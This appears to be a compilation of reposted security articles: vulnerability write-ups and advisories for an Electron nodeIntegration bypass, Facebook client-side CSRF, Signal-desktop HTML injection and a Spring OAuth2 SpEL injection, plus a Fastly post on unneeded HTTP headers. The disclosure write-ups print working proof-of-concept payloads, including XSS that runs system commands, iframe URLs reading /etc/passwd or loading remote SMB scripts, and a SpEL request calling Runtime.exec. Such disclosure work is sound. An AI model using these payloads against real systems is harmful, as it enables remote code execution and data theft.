Credits: @0xNemi and @nickeverdox for finding the vulnerability.

P.S.: If you want to try this exploit out, you can uninstall the relevant update and give it a try!

P.P.S.: Before you ask why I don't use intrinsics to read/write GSBASE, it is because MSVC generates invalid code.

Sursa: https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/
-
CVE-2018-1000136 - Electron nodeIntegration Bypass
May 10, 2018 - Posted By Brendan Scarvell

A few weeks ago, I came across a vulnerability that affected all current versions of Electron at the time (< 1.7.13, < 1.8.4, and < 2.0.0-beta.3). The vulnerability allowed nodeIntegration to be re-enabled, leading to the potential for remote code execution. If you're unfamiliar with Electron, it is a popular framework that allows you to create cross-platform desktop applications using HTML, CSS, and JavaScript. Some popular applications such as Slack, Discord, Signal, Atom, Visual Studio Code, and Github Desktop are all built using the Electron framework. You can find a list of applications built with Electron here.

Electron applications are essentially web apps, which means they're susceptible to cross-site scripting attacks through failure to correctly sanitize user-supplied input. A default Electron application includes access not only to its own APIs, but also to all of Node.js' built-in modules. This makes XSS particularly dangerous, as an attacker's payload can do some nasty things such as requiring in the child_process module and executing system commands on the client side. Atom had an XSS vulnerability not too long ago which did exactly that. You can remove access to Node.js by passing nodeIntegration: false into your application's webPreferences.

There's also a WebView tag feature which allows you to embed content, such as web pages, into your Electron application and run it as a separate process. When using a WebView tag you are also able to pass in a number of attributes, including nodeIntegration. WebView containers do not have nodeIntegration enabled by default. The documentation states that if the webviewTag option is not explicitly declared in your webPreferences, it will inherit the same permissions of whatever the value of nodeIntegration is set to.
By default, Electron also uses its own custom window.open() function which creates a new instance of a BrowserWindow. The child window will inherit all of the parent window's options (which includes its webPreferences) by default. The custom window.open() function does allow you to override some of the inherited options by passing in a features argument:

if (!usesNativeWindowOpen) {
  // Make the browser window or guest view emit "new-window" event.
  window.open = function (url, frameName, features) {
    if (url != null && url !== '') {
      url = resolveURL(url)
    }
    const guestId = ipcRenderer.sendSync('ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN', url, toString(frameName), toString(features))
    if (guestId != null) {
      return getOrCreateProxy(ipcRenderer, guestId)
    } else {
      return null
    }
  }

  if (openerId != null) {
    window.opener = getOrCreateProxy(ipcRenderer, openerId)
  }
}

When Electron's custom window.open function is called, it emits an ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN event. The ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN event handler then parses the features provided, adding them as options to the newly created window, and then emits an ELECTRON_GUEST_WINDOW_MANAGER_INTERNAL_WINDOW_OPEN event.
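The features argument is a comma-separated list of key=value pairs. A rough sketch of how such a string becomes an options object (a simplification for illustration, not Electron's real parsing code):

```javascript
// Rough sketch: turn a window.open features string into an options
// object. Simplified illustration of what the event handler does with
// the features argument, not the actual Electron implementation.
function parseFeatures(features) {
  const options = {};
  for (const pair of features.split(',')) {
    if (!pair) continue;
    const [key, value] = pair.split('=').map(s => s.trim());
    options[key] = value;
  }
  return options;
}

console.log(parseFeatures('webviewTag=yes,show=no'));
// { webviewTag: 'yes', show: 'no' }
```

Note that arbitrary keys pass straight through, which is why features can smuggle webPreferences options into the child window.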
To prevent child windows from being able to do nasty things like re-enabling nodeIntegration when the parent window has it explicitly disabled, guest-window-manager.js contains a hardcoded list of webPreferences options and their restrictive values:

// Security options that child windows will always inherit from parent windows
const inheritedWebPreferences = new Map([
  ['contextIsolation', true],
  ['javascript', false],
  ['nativeWindowOpen', true],
  ['nodeIntegration', false],
  ['sandbox', true],
  ['webviewTag', false]
]);

The ELECTRON_GUEST_WINDOW_MANAGER_INTERNAL_WINDOW_OPEN event handler then calls the mergeBrowserWindowOptions function, which ensures that the restricted attributes of the parent window's webPreferences are applied to the child window:

const mergeBrowserWindowOptions = function (embedder, options) {
  [...]
  // Inherit certain option values from parent window
  for (const [name, value] of inheritedWebPreferences) {
    if (embedder.getWebPreferences()[name] === value) {
      options.webPreferences[name] = value
    }
  }

  // Sets correct openerId here to give correct options to 'new-window' event handler
  options.webPreferences.openerId = embedder.id
  return options
}

And here is where the vulnerability lies. The mergeBrowserWindowOptions function didn't take into account what the default values of these restricted attributes should be if they were undefined. In other words, if webviewTag: false wasn't explicitly declared in your application's webPreferences (and was therefore being inferred by explicitly setting nodeIntegration: false), when mergeBrowserWindowOptions went to check the webviewTag, it would come back undefined, making the above if statement evaluate to false and not apply the parent's webviewTag preference. This allowed window.open to pass the webviewTag option as an additional feature, re-enabling nodeIntegration and allowing the potential for remote code execution.
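The faulty check can be reduced to a few lines. The sketch below is a hypothetical reduction of mergeBrowserWindowOptions for illustration: when the parent never declared webviewTag, the lookup yields undefined, `undefined === false` is false, and the restriction is never forced onto the child:

```javascript
// Reduced illustration of the flawed inheritance check.
// inheritedWebPreferences mirrors the hardcoded list quoted above;
// mergeOptions is a hypothetical stand-in for mergeBrowserWindowOptions.
const inheritedWebPreferences = new Map([
  ['nodeIntegration', false],
  ['webviewTag', false]
]);

function mergeOptions(parentPrefs, childOptions) {
  for (const [name, value] of inheritedWebPreferences) {
    // BUG: if the parent never declared the preference, this comparison
    // is `undefined === false` and the restriction is silently skipped.
    if (parentPrefs[name] === value) {
      childOptions.webPreferences[name] = value;
    }
  }
  return childOptions;
}

// Parent disabled nodeIntegration but never mentioned webviewTag:
const child = mergeOptions(
  { nodeIntegration: false },
  { webPreferences: { webviewTag: true } }
);
console.log(child.webPreferences);
// { webviewTag: true, nodeIntegration: false } — webviewTag survives
```

The child window keeps the attacker-supplied webviewTag: true, which is precisely the hole the proof-of-concept below drives through.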
The following proof-of-concept shows how an XSS payload can re-enable nodeIntegration at run time and allow execution of system commands:

<script>
var x = window.open('data://yoloswag','','webviewTag=yes,show=no');
x.eval(
  "var webview = new WebView;"+
  "webview.setAttribute('webpreferences', 'webSecurity=no, nodeIntegration=yes');"+
  "webview.src = `data:text/html;base64,PHNjcmlwdD5yZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnbHMgLWxhJywgZnVuY3Rpb24gKGUscikgeyBhbGVydChyKTt9KTs8L3NjcmlwdD4=`;"+
  "document.body.appendChild(webview)"
);
</script>

If you find an Electron application with the nodeIntegration option disabled and it contains either an XSS vulnerability through poor sanitization of user input or a vulnerability in another dependency of the application, the above proof-of-concept can allow for remote code execution, provided that the application is using a vulnerable version of Electron (version < 1.7.13, < 1.8.4, or < 2.0.0-beta.3) and hasn't manually opted into one of the following:

- Declared webviewTag: false in its webPreferences.
- Enabled the nativeWindowOpen option in its webPreferences.
- Intercepting new-window events and overriding event.newGuest without using the supplied options tag.

We'd also like to thank the Electron team for being extremely responsive and for quickly providing a patch to the public. This vulnerability was assigned the CVE identifier CVE-2018-1000136.

Sursa: https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2018-1000136---Electron-nodeIntegration-Bypass/
-
“Client-Side” CSRF

Facebook Bug Bounty · Friday, May 11, 2018

At Facebook, the Whitehat program receives hundreds of submissions a month, covering a wide range of vulnerability types. One of the interesting classes of issue which we've seen recently is what we've termed “Client-Side” Cross-Site Request Forgery (CSRF), for which we've awarded on average $7.5k.

What is CSRF?

Before we jump into technical details, let's recap on what CSRF is. This is a class of issue in which an attacker can perform a state-changing action, such as posting a status, on behalf of another user. This is made possible by the fact that browsers (currently, until Same-Site Cookies are supported in all major browsers) send the user's cookies with a request, regardless of the request origin. At Facebook, like other large sites, we have protections in place to mitigate this kind of attack. The most common type of protection is adding a random token to each state-changing request, and verifying it server-side. An attacker has no way of knowing this value in advance, which means we can ensure any request has explicitly been made by the user. If you're participating in our Whitehat program, then you might see this token being sent - we name it “fb_dtsg”.

“Client-Side” CSRF

Whilst most researchers think of CSRF as a server-side problem, “Client-Side” CSRF exists in the user's browser or mobile device - a malicious user could perform arbitrary requests to a CSRF-protected end-point by modifying the end-point to which the client-side code makes an HTTP request, with a valid CSRF token attached. This could be a form submission, or an XHR call. For example, a product might want to log some analytics data after the page is loaded, which could look like the following code:

let analytic_uri = window.location.hash.substr(1);
(new AsyncRequest('/ajax' + analytic_uri))
  .method(POST)
  .setBody({csrf_token: csrf_token})
  .send()

The user would browse to /profile.php#/profile/log.
On page load, the JS would make a POST request to “/ajax/profile/log”, and the data is saved. However, if an attacker modifies the fragment to “#/updatestatus?status=Hello”, then the JS instead makes a request to update the user's status, with a valid CSRF token.

One good trick for hunting for these kinds of issues is looking for HTTP requests which are made after the page is rendered - if the end-point being requested is contained in the page's query string or fragment, then it's worth investigating! If you can only control part of the end-point, then it could still be vulnerable, by using tricks like path traversal.

Making arbitrary GraphQL requests

We had a great submission from one of our top researchers, Philippe Harewood, which used this style of issue to make arbitrary GraphQL requests on behalf of another user, for which we rewarded him $7,500. On https://business.instagram.com, we had a page which took a business ID from the request, and made a Graph API request to that particular business:

POST /[business_id]?fields=...
access_token=...

Facebook's Graph API is protected against CSRF by requiring a valid access token from the user. Without this token, the request is un-authenticated. Philippe found that since the business ID wasn't validated to be an integer, he could change this to point to our GraphQL end-point (graphql), and make authenticated requests for the user (such as posting a new status), since the JS was making the request with the access token:

POST /graphql?q=Mutation...&fields=...
access_token=...

This is a great example of influencing authenticated requests to point somewhere completely unintended.

Conclusion

These issues are an interesting and novel take on an older class of bugs, which has prompted us to take a look at ways of detecting and mitigating bugs in JS. If you too enjoy investigating and solving novel bugs, then come join the ProdSec team!

Sursa: https://www.facebook.com/notes/facebook-bug-bounty/client-side-csrf/2056804174333798/
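The vulnerable pattern from the analytics snippet boils down to concatenating an attacker-controlled fragment onto a fixed endpoint prefix. A condensed, testable sketch (buildEndpoint is a hypothetical name for the logic shown in the snippet):

```javascript
// Condensed sketch of the client-side CSRF pattern described above:
// the endpoint of a CSRF-protected request is derived from the URL
// fragment. buildEndpoint is a hypothetical helper name.
function buildEndpoint(hash) {
  const analytic_uri = hash.substr(1); // strip leading '#'
  return '/ajax' + analytic_uri;
}

// Intended use: /profile.php#/profile/log
console.log(buildEndpoint('#/profile/log'));
// /ajax/profile/log

// Attacker-chosen fragment redirects the token-bearing POST:
console.log(buildEndpoint('#/updatestatus?status=Hello'));
// /ajax/updatestatus?status=Hello
```

Since the CSRF token is attached regardless of where the request goes, controlling the path is enough to weaponize it.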
-
signal-desktop HTML tag injection advisory

Title: Signal-desktop HTML tag injection
Date Published: 2018-05-14
Last Update: 2018-05-14
CVE Name: CVE-2018-10994
Class: Code injection
Remotely Exploitable: Yes
Locally Exploitable: No
Vendors contacted: Signal.org

Vulnerability Description:

Signal-desktop is the standalone desktop version of the secure Signal messenger. This software is vulnerable to remote code execution from a malicious contact, by sending a specially crafted message containing HTML code that is injected into the chat windows (cross-site scripting).

Vulnerable Packages:

Signal-desktop messenger v1.7.1
Signal-desktop messenger v1.8.0
Signal-desktop messenger v1.9.0
Signal-desktop messenger v1.10.0

Originally found in v1.9.0 and v1.10.0, but after reviewing the source code the aforementioned are the impacted versions.

Solution/Vendor Information/Workaround:

Upgrade to Signal-desktop messenger v1.10.1 or v1.11.0-beta.3. For safer communications on desktop systems, please consider the use of a safer end-point client like PGP or GnuPG instead.

Credits:

This vulnerability was found and researched by Iván Ariel Barrera Oro (@HacKanCuBa), Alfredo Ortega (@ortegaalfredo) and Juliano Rizzo (@julianor), with assistance from Javier Lorenzo Carlos Smaldone (@mis2centavos).

Technical Description – Exploit/Concept Code

While discussing an XSS vulnerability on a website using the Signal-desktop messenger, it was found that the messenger software also displayed a code-injection vulnerability while parsing the affected URLs. The Signal-desktop software fails to sanitize specific HTML-encoded HTML tags that can be used to inject HTML code into remote chat windows. Specifically, the <img> and <iframe> tags can be used to include remote or local resources. For example, the use of iframes enables full code execution, allowing an attacker to download/upload files, information, etc. The <script> tag was also found injectable.
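The general fix for this class of bug is output encoding: HTML metacharacters in untrusted message content must be escaped before the text is rendered. A generic escaping sketch (illustrative only, not Signal's actual patch):

```javascript
// Generic HTML-escaping sketch (not Signal's actual patch): encode the
// metacharacters that allow tag and attribute injection before
// inserting untrusted message text into the DOM.
function escapeHtml(untrusted) {
  return untrusted.replace(/[&<>"']/g, c => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;'
  }[c]));
}

console.log(escapeHtml('<iframe src=/etc/passwd>'));
// &lt;iframe src=/etc/passwd&gt;
```

With such encoding in place, the injected markup in the examples below would render as inert text instead of live <img>/<iframe>/<script> elements.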
In the Windows operating system, the CSP fails to prevent remote inclusion of resources via the SMB protocol. In this case, remote execution of JavaScript can be achieved by referencing the script in an SMB share as the source of an iframe tag, for example: <iframe src=\\DESKTOP-XXXXX\Temp\test.html>. The included JavaScript code is then executed automatically, without any interaction needed from the user. The vulnerability can be triggered in the signal-desktop client by sending a specially crafted message.

Examples:

Show an iframe with some text:
http://hacktheplanet/?p=%3Ciframe%20srcdoc="<p>PWONED!!</p>"%3E%3C/iframe%3E

Display content of user’s own /etc/passwd file:
http://hacktheplanet/?p=%3d%3Ciframe%20src=/etc/passwd%3E

Include and execute a remote JavaScript file (for Windows clients):
http://hacktheplanet/?p=%3d%3Ciframe%20src=\\XXX.XXX.XXX.XXX\Temp\test.html%3E

Show a base64-encoded image (bypass “click to download image”):
http://hacktheplanet/?p=%3Cimg%20src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/wAALCAAtADwBAREA/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/9oACAEBAAA/AMapRbv5YckKD0z1pPJbjJAzSGIgjcQMnFEkZSTZkE+1STWksTKrAZbpThYzfLuAUN3JFJ9kkyeV4PrTBFyNzCpSGuZiRgY4ArRgtAvzSfMfSqN3EYpjsA2noTg1B87HlqNrnqxP40nlt6ml8pvWo/MY/wARqzAzcEVorK24RuAAw4IqLUo2EKFFJIOM9azN8oOMkfhTz9oVdxDhfWlR3ZOWJ/Gpdzep/OqVTQEq2MVpo4aNWABKHnNLIzNHGW7OST6DFZ92wEoAGAvX3qNrl/KaEH5CePaliPyYqVTwKrIu41O1u0Z4BP06irUDKiky5DYx04p8sxddpwFA6etZcrFnJPepLa2NwSFPIoQbQVPUHFTLjFUskd6d5j/3m/Ok3sf4j+dG9j/EfzpKVXZPusR9DSZPrS7j6mv/2Q=="%3e

Timeline:

2018-05-10 18:45 GMT-3: vuln discovered
2018-05-11 13:03 GMT-3: emailed Signal security team
2018-05-11 15:02 GMT-3: reply from Signal: vuln confirmed & patch ongoing
2018-05-11 16:12 GMT-3: patch committed
2018-05-11 18:00 GMT-3: signal-desktop update published
2018-05-14 18:00 GMT-3: public disclosure

References:

Patch: https://github.com/signalapp/Signal-Desktop/compare/v1.11.0-beta.2…v1.11.0-beta.3
Writeup: https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection/

Sursa: https://ivan.barreraoro.com.ar/signal-desktop-html-tag-injection/advisory/
-
-
-
The headers we don't want By Andrew Betts | May 10, 2018 If you want to learn more about headers, don’t miss Andrew’s talk at Altitude London on May 22. HTTP headers are an important way of controlling how caches and browsers process your web content. But many are used incorrectly or pointlessly, which adds overhead at a critical time in the loading of your page, and may not work as you intended. In this first of a series of posts about header best practice, we’ll look at unnecessary headers. Most developers know about and depend on a variety of HTTP headers to make their content work. Those that are best known include Content-Type and Content-Length, which are both almost universal. But more recently, headers such as Content-Security-Policy and Strict-Transport-Security have started to improve security, and Link rel=preload headers to improve performance. Few sites use these, despite their wide support across browsers. At the same time, there are lots of headers that are hugely popular but aren’t new and aren’t actually all that useful. We can prove this using HTTP Archive, a project run by Google and sponsored by Fastly that loads 500,000 websites every month using WebPageTest, and makes the results available in BigQuery. 
From the HTTP Archive data, here are the 30 most popular response headers (based on the number of domains in the archive which are serving each header), and roughly how useful each one is:

Header name | Requests | Domains | Status
date | 48779277 | 535621 | Required by protocol
content-type | 47185627 | 533636 | Usually required by browser
server | 43057807 | 519663 | Unnecessary
content-length | 42388435 | 519118 | Useful
last-modified | 34424562 | 480294 | Useful
cache-control | 36490878 | 412943 | Useful
etag | 23620444 | 412370 | Useful
content-encoding | 16194121 | 409159 | Required for compressed content
expires | 29869228 | 360311 | Unnecessary
x-powered-by | 4883204 | 211409 | Unnecessary
pragma | 7641647 | 188784 | Unnecessary
x-frame-options | 3670032 | 105846 | Unnecessary
access-control-allow-origin | 11335681 | 103596 | Useful
x-content-type-options | 11071560 | 94590 | Useful
link | 1212329 | 87475 | Useful
age | 7401415 | 59242 | Useful
x-cache | 5275343 | 56889 | Unnecessary
x-xss-protection | 9773906 | 51810 | Useful
strict-transport-security | 4259121 | 51283 | Useful
via | 4020117 | 47102 | Unnecessary
p3p | 8282840 | 44308 | Unnecessary
expect-ct | 2685280 | 40465 | Useful
content-language | 334081 | 37927 | Debatable
x-aspnet-version | 676128 | 33473 | Unnecessary
access-control-allow-credentials | 2804382 | 30346 | Useful
x-robots-tag | 179177 | 24911 | Not relevant to browsers
x-ua-compatible | 489056 | 24811 | Unnecessary
access-control-allow-methods | 1626129 | 20791 | Useful
access-control-allow-headers | 1205735 | 19120 | Useful

Let’s look at the unnecessary headers and see why we don’t need them, and what we can do about it.

Vanity (server, x-powered-by, via)

You may be very proud of your choice of server software, but most people couldn’t care less. At worst, these headers might be divulging sensitive data that makes your site easier to attack.

Server: apache
X-Powered-By: PHP/5.1.1
Via: 1.1 varnish, 1.1 squid

RFC7231 allows for servers to include a Server header in the response, identifying the software used to serve the content. This is most commonly a string like “apache” or “nginx”.
While it’s allowed, it’s not mandatory, and offers very little value to either developers or end users. Nevertheless, this is the third most popular HTTP response header on the web today.

X-Powered-By is the most popular header in our list that is not defined in any standard, and has a similar purpose, though normally refers to the application platform that sits behind the web server. Common values include “ASP.net”, “PHP” and “Express”. Again this isn’t providing any tangible benefit and is taking up space.

More debatable perhaps is Via, which is required (by RFC7230) to be added to the request by any proxy through which it passes to identify the proxy. This can be the proxy’s hostname, but is more likely to be a generic identifier like “vegur”, “varnish”, or “squid”. Removing (or not setting) this header on a request can cause proxy forwarding loops. However, interestingly it is also copied into the response on the way back to the browser, and here it’s just informational and no browsers do anything with it, so it’s reasonably safe to get rid of it if you want to.

Deprecated standards (P3P, Expires, X-Frame-Options, X-UA-Compatible)

Another category of headers is those that do have an effect in the browser but are not (or are no longer) the best way of achieving that effect.

P3P: cp="this is not a p3p policy"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Frame-Options: SAMEORIGIN
X-UA-Compatible: IE=edge

P3P is a curious animal. I had no idea what this was, and even more curiously, one of the most common values is “this is not a p3p policy”. Well, is it, or isn’t it? The story here goes back to an attempt to standardise a machine-readable privacy policy. There was disagreement on how to surface the data in browsers, and only one browser ever implemented the header - Internet Explorer. Even in IE though, P3P didn’t trigger any visual effect to the user; it just needs to be present to permit access to third party cookies in iframes.
Some sites even set a non-conforming P3P policy like the one above – even though doing so is on shaky legal ground. Needless to say, reading third party cookies is generally a bad idea, so if you don’t do it, then you won’t need to set a P3P header!

Expires is almost unbelievably popular, considering that Cache-Control has been preferred over Expires for 20 years. Where a Cache-Control header includes a max-age directive, any Expires header on the same response will be ignored. But there are a massive number of sites setting both, and the Expires header is most commonly set to Thu, 01 Dec 1994 16:00:00 GMT, because you want your content to not be cached and copy-pasting the example date from the spec is certainly one way of doing that. But there is simply no reason to do this. If you have an Expires header with a date in the past, replace it with:

Cache-Control: no-store, private

(no-store is a very strong directive not to write the content to persistent storage, so depending on your use case you might actually prefer no-cache for better performance, for example when using back/forward navigation or resuming hibernated tabs)

Some of the tools that audit your site will tell you to add an X-Frame-Options header with a value of ‘SAMEORIGIN’. This tells browsers that you are refusing to be framed by another site, and is generally a good defense against clickjacking. However, the same effect can be achieved, with more consistent support and more robust definition of behaviour, by doing:

Content-Security-Policy: frame-ancestors 'self'

This has the additional benefit of being part of a header (CSP) which you should have anyway for other reasons (more on that later). So you can probably do without X-Frame-Options these days.
Finally, back in the IE9 days, Microsoft introduced ‘compatibility view’, and would potentially render a page using the IE8 or IE7 engine, even when the user was browsing with IE9, if the browser thought that the page might require the earlier version to work properly. Those heuristics were not always correct, and developers were able to override them by using an X-UA-Compatible header or meta tag. In fact, this increasingly became a standard part of frameworks like Bootstrap. These days, this header achieves very little - very few people are using browsers that would understand it, and if you are actively maintaining your site it’s very unlikely that you are using technologies that would trigger compatibility view.

Debug data (X-ASPNet-Version, X-Cache)

It’s kind of astonishing that some of the most popular headers in common use are not in any standard. Essentially this means that somehow, thousands of websites seem to have spontaneously agreed to use a particular header in a particular way.

X-Cache: HIT
X-Request-ID: 45a336c7-1bd5-4a06-9647-c5aab6d5facf
X-ASPNet-Version: 3.2.32
X-AMZN-RequestID: 0d6e39e2-4ecb-11e8-9c2d-fa7ae01bbebc

In reality, these ‘unknown’ headers are not separately and independently minted by website developers. They are typically artefacts of using particular server frameworks, software or specific vendors’ services (in this example set, the last header is a common AWS header). X-Cache, in particular, is actually added by Fastly (other CDNs also do this), along with other Fastly-related headers like X-Cache-Hits and X-Served-By. When debugging is enabled, we add even more, such as Fastly-Debug-Path and Fastly-Debug-TTL. These headers are not recognised by any browser, and removing them makes no difference to how your pages are rendered. However, since these headers might provide you, the developer, with useful information, you might like to keep a way of turning them on.
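That "keep a way of turning them on" idea can be sketched as a small response filter, mirroring the VCL approach of gating debug headers on a request flag (a hypothetical helper, not Fastly code):

```javascript
// Hypothetical response filter: always drop vanity headers, and drop
// debug headers unless the request carried an explicit debug flag.
const ALWAYS_DROP = ['server', 'x-powered-by', 'via'];
const DEBUG_ONLY = ['x-cache', 'x-request-id', 'x-served-by'];

function filterHeaders(responseHeaders, debugRequested) {
  const out = {};
  for (const [name, value] of Object.entries(responseHeaders)) {
    const lower = name.toLowerCase();
    if (ALWAYS_DROP.includes(lower)) continue;
    if (!debugRequested && DEBUG_ONLY.includes(lower)) continue;
    out[name] = value;
  }
  return out;
}

const headers = { 'Server': 'apache', 'X-Cache': 'HIT', 'Content-Type': 'text/html' };
console.log(filterHeaders(headers, false)); // { 'Content-Type': 'text/html' }
console.log(filterHeaders(headers, true));  // { 'X-Cache': 'HIT', 'Content-Type': 'text/html' }
```

Public visitors get the trimmed response; your dev team, sending the flag, still sees the cache diagnostics.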
Misunderstandings (Pragma)

I didn’t expect to be in 2018 writing a post about the Pragma header, but according to our HTTP Archive data it’s still the 11th most popular. Not only was Pragma deprecated as long ago as 1997, but it was never intended to be a response header anyway - as specified, it only has meaning as part of a request.

Pragma: no-cache

Nevertheless, its use as a response header is so widespread that some browsers recognise it in this context as well. Today the probability that your response will transit a cache that understands Pragma in a response context, and doesn’t understand Cache-Control, is vanishingly small. If you want to make sure that something isn’t cached, Cache-Control: no-store, private is all you need.

Non-Browser (X-Robots-Tag)

One header in our top 30 is a non-browser header. X-Robots-Tag is intended to be consumed by a crawler, such as Google or Bing’s bots. Since it has no meaning to a browser, you could choose to only set it when the requesting user-agent is a crawler. Equally, you might decide that this makes testing harder, or perhaps that it violates the terms of service of the search engine.

Bugs

Finally, it’s worth finishing on an honourable mention for simple bugs. In a request, a Host header makes sense, but seeing it on a response probably means your server is misconfigured somehow (I’d love to know how, exactly). Nevertheless, 68 domains in HTTP Archive are returning a Host header in their responses.

Removing headers at the edge

Fortunately, if your site is behind Fastly, removing headers is pretty easy using VCL.
It makes sense that you might want to keep the genuinely useful debug data available to your dev team, but hide it from public users, so that’s easily done by detecting a cookie or inbound HTTP header:

unset resp.http.Server;
unset resp.http.X-Powered-By;
unset resp.http.X-Generator;

if (!req.http.Cookie:debug && !req.http.Debug) {
  unset resp.http.X-Amzn-RequestID;
  unset resp.http.X-Cache;
}

In the next post in this series, I’ll be talking about best practices for headers that you should be setting, and how to enable them at the edge.

Author: Andrew Betts | Web Developer and Principal Developer Advocate

Sursa: https://www.fastly.com/blog/headers-we-dont-want
-
Beware of the Magic SpEL(L) – Part 2 (CVE-2018-1260)

Written by Philippe Arteau

On Tuesday, we released the details of an RCE vulnerability affecting Spring Data (CVE-2018-1273). We are now repeating the same exercise for a similar RCE vulnerability in Spring Security OAuth2 (CVE-2018-1260). We are going to present the attack vector, its discovery method and the conditions required for exploitation. This vulnerability also has similarities with another vulnerability disclosed in 2016. The resemblance will be discussed in the section where we review the fix.

Analyzing a potential vulnerability

It all started with the report of the bug pattern SPEL_INJECTION by Find Security Bugs. It reported the use of SpelExpressionParser.parseExpression() with a dynamic parameter, the same API used in the previous vulnerability we had found. The expression parser is used to parse expressions placed between curly brackets “${…}”.

public SpelView(String template) {
    this.template = template;
    this.prefix = new RandomValueStringGenerator().generate() + "{";
    this.context.addPropertyAccessor(new MapAccessor());
    this.resolver = new PlaceholderResolver() {
        public String resolvePlaceholder(String name) {
            Expression expression = parser.parseExpression(name); //Expression parser
            Object value = expression.getValue(context);
            return value == null ? null : value.toString();
        }
    };
}

The controller class WhitelabelApprovalEndpoint uses this SpelView class to build the approval page for the OAuth2 authorization flow.
The SpelView class evaluates the string named “template” – see code below – as a Spring Expression.

@RequestMapping("/oauth/confirm_access")
public ModelAndView getAccessConfirmation(Map<String, Object> model, HttpServletRequest request) throws Exception {
    String template = createTemplate(model, request);
    if (request.getAttribute("_csrf") != null) {
        model.put("_csrf", request.getAttribute("_csrf"));
    }
    return new ModelAndView(new SpelView(template), model); //template variable is a SpEL
}

Following the methods createTemplate() and createScopes(), we can see that the attribute “scopes” is appended to the HTML template which will be evaluated as an expression. The only model parameter bound to the template is a CSRF token. However, the CSRF token will not be under the control of a remote user.

protected String createTemplate(Map<String, Object> model, HttpServletRequest request) {
    String template = TEMPLATE;
    if (model.containsKey("scopes") || request.getAttribute("scopes") != null) {
        template = template.replace("%scopes%", createScopes(model, request)).replace("%denial%", "");
    }
    [...]

private CharSequence createScopes(Map<String, Object> model, HttpServletRequest request) {
    StringBuilder builder = new StringBuilder("<ul>");
    @SuppressWarnings("unchecked")
    Map<String, String> scopes = (Map<String, String>) (model.containsKey("scopes") ? model.get("scopes") : request.getAttribute("scopes")); //Scope attribute loaded here
    for (String scope : scopes.keySet()) {
        String approved = "true".equals(scopes.get(scope)) ? " checked" : "";
        String denied = !"true".equals(scopes.get(scope)) ? " checked" : "";
        String value = SCOPE.replace("%scope%", scope).replace("%key%", scope).replace("%approved%", approved).replace("%denied%", denied);
        builder.append(value);
    }
    builder.append("</ul>");
    return builder.toString();
}

At this point, we are unsure if the scopes attribute can be controlled by the remote user. While an attribute (request.getAttribute(..)) represents session values stored server-side, scope is an optional parameter that is part of the OAuth2 flow. The parameter might be accessible to the user, saved to the server-side attributes and finally loaded into the previous template. After some research in the documentation and some manual tests, we found that “scope” is a GET parameter that is part of the implicit OAuth2 flow. Therefore, implicit mode would be required for our vulnerable application.
Proof-of-Concept and Limitations

When testing our application, we realized that the scopes were validated against a scope whitelist defined by the user/client. If this whitelist is configured, we can’t be creative with the scope parameter. If the scopes are simply not defined, no validation is applied to the name of the scopes. This limitation will likely make most Spring OAuth2 applications safe.

The first request used the scope “${1338-1}”, see picture below. Based on the response, we now have confirmation that the scope parameter’s value can reach the SpelView expression evaluation. We can see multiple instances of the string “scope.1337” in the resulting HTML.

[Figure: Pushing the probe value ${1338-1}]

A second test was made using the expression “${T(java.lang.Runtime).getRuntime().exec(“calc.exe”)}” to verify that the expressions are not limited to simple arithmetic operations.

[Figure: Simple proof-of-concept request spawning a calc.exe subprocess]

For easier reproduction, here is the raw HTTP request from the previous screenshot. Some characters – mainly curly brackets – were not supported by the web container and needed to be URL encoded in order to reach the application.
{ -> %7b

POST /oauth/authorize?response_type=code&client_id=client&username=user&password=user&grant_type=password&scope=%24%7bT(java.lang.Runtime).getRuntime().exec(%22calc.exe%22)%7d&redirect_uri=http://csrf.me HTTP/1.1
Host: localhost:8080
Authorization: Bearer 1f5e6d97-7448-4d8d-bb6f-4315706a4e38
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 0

Reviewing The Fix

The solution chosen by the Pivotal team was to replace SpelView with a simpler view, with basic concatenation. This eliminates all possible paths to a SpEL evaluation. The first patch proposed introduced a potential XSS vulnerability, but luckily this was spotted before any release was made. The scope values are now properly escaped and free from any injection.

More importantly, this solution improved the security of another endpoint: WhitelabelErrorEndpoint. This endpoint also no longer uses a SpelView. It was found vulnerable to an identical attack vector in 2016: Spring-OAuth2 also used the SpelView class to build the error page. The interesting twist is that the template parameter was static, but the parameters bound to the template were evaluated recursively. This means that any value in the model could lead to remote code execution.

[Figure: Example with normal values]
[Figure: Example with an expression included in the model]

This recursive evaluation was fixed by adding a random prefix to the expression boundary. The security of this template now relies on the randomness of 6 characters (62 possibilities to the power of 6).
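For scale, that keyspace works out to roughly 5.7 × 10^10 possible prefixes (a quick arithmetic check):

```javascript
// 62 alphanumeric characters (a-z, A-Z, 0-9) over 6 positions:
const keyspace = Math.pow(62, 6);
console.log(keyspace); // 56800235584
```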
Some analysts were skeptical of this fix and raised the risk that the prefix could be guessed if enough attempts are made. However, this is no longer a possibility since SpelView was also removed from this endpoint.

